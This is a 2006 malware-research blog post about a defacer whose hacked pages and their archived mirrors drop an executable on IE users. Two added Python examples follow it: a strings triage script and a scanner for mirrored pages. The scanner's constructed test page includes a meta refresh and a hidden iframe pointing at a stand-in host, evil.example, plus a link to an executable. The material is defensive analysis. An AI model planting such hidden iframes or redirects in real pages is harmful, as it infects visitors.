SpywareGuide powered by FaceTime Security Labs


  • Bl4ck: Coming Soon to a Hacked Page Near You

Quite often you'll come across a website that's been hacked and dismiss the no doubt humorous picture, comical text and "advice" given to the site admin as little more than a harmless prank, something to be filed away on a hacked-site archive. Well, beware: many of those "hacked site" archives don't clean up the pages before mirroring them, so if the hacker decided to put something evil on the page, viewing the archived copy may well hit you with it too. And wouldn't you know it, we have one such example for you coming up.

An individual under the alias of SnIpEr_SA is currently making his way through as many domains as he can handle (currently 25+ in the last ten days, which thankfully isn't very prolific) and leaving a little "present" for anyone unlucky enough to view his pages while using IE:

[Screenshot: http://blog.spywareguide.com/upload/2006/08/bl4ck1-thumb.jpg]

As you can see, the file (a 5kb MS-DOS application) is downloaded to the Temp folder. The interesting aspect of this file is its strange behaviour.

[Screenshot: http://blog.spywareguide.com/upload/2006/08/bl4ck22-thumb.jpg]

In fact, it doesn't seem to do much of anything, which simply makes me all the more suspicious. Closer examination of the file reveals some interesting findings. Usually, looking inside the code of a malicious application reveals all kinds of things: additional download links, clues as to what the file does, passwords, the name of the creator... you name it, we've found it on our travels. However, this is the first time I've looked inside a file like this and found what appears to be the HTML for a webpage telling you "this account has been suspended". Even stranger, there are a number of links to various webhosting companies (but not the specific download links you would expect), an advert link and a reference to Elitemediagroup.
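The kind of quick look inside a dropped file described above, as an added example that is not the lab's own tooling: pull out the printable strings, then sort them into URLs, direct executable downloads, embedded HTML and keywords worth following up. It runs on a constructed byte blob that merely imitates what the post reports (a fake "account suspended" page, hosting and advert URLs, a company name); it is not the real sample, and the hosts in it are invented.

```python
import hashlib
import re

# Constructed stand-in for the dropped 5kb file described in the post: a few
# header-like bytes followed by the kind of text the researchers reported.
# This is NOT the real sample; the hosts are made up.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00"
    b"<html><head><title>Account Suspended</title></head>"
    b"<body>This account has been suspended.</body></html>\x00"
    b"http://hosting.example/plans.html\x00"
    b"http://ads.example/click?id=123\x00"
    b"\x01\x02\x03\x04"
    b"Elitemediagroup\x00"
    b"\x7f\x7f\x7f"
)

MIN_LEN = 6  # shortest printable run worth reporting, as with strings(1)

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
HTML_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*[^>]*>", re.I)
EXE_RE = re.compile(r"\.(exe|dll|scr|com|bat|pif)(\?|$)", re.I)


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> list:
    """Return every run of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(data: bytes) -> dict:
    """Summarise what a quick look inside a suspicious file turns up."""
    strings = extract_strings(data)
    urls = sorted({u for s in strings for u in URL_RE.findall(s)})
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
        "is_mz": data[:2] == b"MZ",  # DOS/PE executable header
        "string_count": len(strings),
        "urls": urls,
        # URLs pointing straight at an executable: the usual downloader tell
        "direct_downloads": [u for u in urls if EXE_RE.search(u)],
        # embedded markup, e.g. a fake "account suspended" page
        "html_strings": [s for s in strings if HTML_RE.search(s)],
        # anything naming an affiliate or ad network worth following up
        "keywords": [s for s in strings if "elitemedia" in s.lower()],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

On the constructed sample this reports an MZ header, two URLs, no direct executable download, one embedded HTML page and the Elitemediagroup keyword, which is exactly the odd profile the post describes: plenty of web content, no obvious payload. An empty `direct_downloads` list is a prompt for deeper analysis (packing, runtime fetching, or a file that is simply a decoy), not a clean bill of health.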

As a parting thought, it's worth noting that if you go to sites such as Zone-H to view the latest archived webpage defacements, they do indeed include the above hacks by SnIpEr_SA. However, the mirrors also include the infection file, which raises the interesting question of how many people over the last however many years have been infected simply by viewing archived defacements.

Suddenly, checking out all those cool hacks doesn't seem quite as appealing...
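As an added example, not part of the original post: a small check to run over a mirrored defacement page before anyone views it in a browser. The post does not say how the file gets onto the viewer's machine, so the scanner makes no assumption about that and simply flags the things an archived page can carry that act without a click (iframe, frame, object, embed, script and applet sources, meta refresh) plus any reference at all to an executable. The sample page, its hosts and file names are constructed, not taken from any real mirror.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements whose referenced resource loads as soon as the page is rendered,
# and the attribute that carries the reference.
AUTO_LOAD = {
    "iframe": "src", "frame": "src", "script": "src",
    "object": "data", "embed": "src", "applet": "code",
}
EXE_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".dll", ".hta")


class DefacementScanner(HTMLParser):
    """Collect (kind, tag, reference) findings from a mirrored page."""

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def _offsite(self, url: str) -> bool:
        host = urlsplit(url).hostname
        return bool(host) and host.lower() != self.page_host

    def handle_starttag(self, tag, attrs):
        a = {k: v for k, v in attrs if v is not None}
        # 1. anything that loads without a click
        if tag in AUTO_LOAD and a.get(AUTO_LOAD[tag]):
            ref = a[AUTO_LOAD[tag]]
            kind = "auto-load (off-site)" if self._offsite(ref) else "auto-load"
            self.findings.append((kind, tag, ref))
        # 2. a meta refresh sends the viewer somewhere else automatically
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", tag, a.get("content", "")))
        # 3. any reference, clicked or not, that points at an executable
        for attr in ("href", "src", "data"):
            ref = a.get(attr)
            if ref and urlsplit(ref).path.lower().endswith(EXE_EXT):
                self.findings.append(("executable", tag, ref))


def scan_mirror(html_text: str, page_host: str) -> list:
    """Return the findings for one mirrored page; an empty list means nothing flagged."""
    parser = DefacementScanner(page_host)
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed mirror of a defaced page (not a real archive entry).
SAMPLE_MIRROR = """<html><head><title>hacked</title>
<meta http-equiv="refresh" content="0;url=http://evil.example/drop/">
</head><body>
<h1>0wned</h1><p>admin, patch your box!</p>
<iframe src="http://evil.example/drop/load.htm" width="0" height="0"></iframe>
<a href="/files/present.exe">greetz</a>
<img src="/images/flag.gif">
</body></html>"""

if __name__ == "__main__":
    for kind, tag, ref in scan_mirror(SAMPLE_MIRROR, "victim.example"):
        print(f"{kind:22} <{tag}> {ref}")
```

The constructed page produces three findings: the meta refresh, a zero-size off-site iframe and a link to an executable; the image is ignored. A clean result from this scanner only means none of these obvious vectors is present. Inline script, encoded content and anything the browser itself fetches later are outside its view, so treat it as a first filter for an archive, not a verdict on the page.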

Research Summary Write-Up: Chris Boyd, Director of Malware Research
Technical Research and Discovery: Chris Mannon, FSL Senior Threat Researcher


  • Comments

I will continue to visit. Enjoyed the reading, thanks.


Hi there! Just want to say that I find your site interesting enough for me. Though interesting for me. Useful information and all is well arranged. I will visit your site more often from now on and I bookmarked it. Thank you for your work.


myspace has been hit with this assholish virus ^^



© Copyright 2006, FaceTime Communications, Inc. All rights reserved.